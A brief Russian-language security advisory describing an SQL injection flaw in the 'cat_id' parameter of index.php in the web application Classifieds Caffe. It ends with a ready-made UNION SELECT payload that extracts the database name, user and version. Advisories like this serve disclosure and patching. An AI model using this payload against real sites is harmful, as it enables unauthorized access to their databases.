Программа: Classifieds Caffe
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
/index.php?action=add&cat_id=[SQL]
7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*
